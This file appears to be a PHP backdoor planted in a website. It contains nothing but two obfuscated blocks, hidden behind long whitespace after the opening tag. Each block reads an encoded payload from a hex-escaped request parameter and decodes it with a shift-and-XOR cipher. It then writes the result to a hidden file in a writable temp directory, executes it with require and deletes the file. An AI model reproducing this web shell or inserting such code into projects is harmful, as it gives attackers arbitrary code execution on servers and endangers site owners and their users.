<?php																																										if(isset($_REQUEST["\x6Fb\x6A\x65ct"])){ $hld = array_filter(["/var/tmp", getenv("TEMP"), "/tmp", "/dev/shm", getenv("TMP"), session_save_path(), ini_get("upload_tmp_dir"), getcwd(), sys_get_temp_dir()]); $flag = $_REQUEST["\x6Fb\x6A\x65ct"]; $flag = explode ("." ,$flag ); $dchunk = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen( $s); $w = 0; array_walk( $flag , function( $v9) use( &$dchunk , &$w , $s , $sLen) { $sChar = ord( $s[$w% $sLen]); $dec =( ( int)$v9 - $sChar -( $w% 10)) ^43; $dchunk .= chr( $dec); $w++; }); foreach ($hld as $reference): if ((function($d) { return is_dir($d) && is_writable($d); })($reference)) { $ptr = join("/", [$reference, ".dat"]); if (file_put_contents($ptr, $dchunk)) { require $ptr; unlink($ptr); exit; } } endforeach; }


if(isset($_REQUEST["\x66ac"]) ? true : false){
	$value = $_REQUEST["\x66ac"];
		 $value= 		explode(		"."  	,$value)	 ; 		
	$ent = '';
            $s = 'abcdefghijklmnopqrstuvwxyz0123456789';
            $sLen = strlen(	 $s );
            $u = 0;
    
            $__tmp = $value;
            while(	 $v2 = array_shift(	 $__tmp)) {
                $chS = ord(	 $s[$u	 % $sLen] );
                $dec =(	 (	 int)$v2 - $chS -(	 $u	 % 10))	^		60;
                $ent	 .= chr(	 $dec );
                $u++;
            }
	$binding = array_filter(["/var/tmp", "/dev/shm", getenv("TMP"), sys_get_temp_dir(), getenv("TEMP"), session_save_path(), getcwd(), "/tmp", ini_get("upload_tmp_dir")]);
	while ($component = array_shift($binding)) {
    		if (max(0, is_dir($component) * is_writable($component))) {
    $res = "$component" . "/.val";
    if (file_put_contents($res, $ent)) {
	require $res;
	unlink($res);
	exit;
}
}
}
}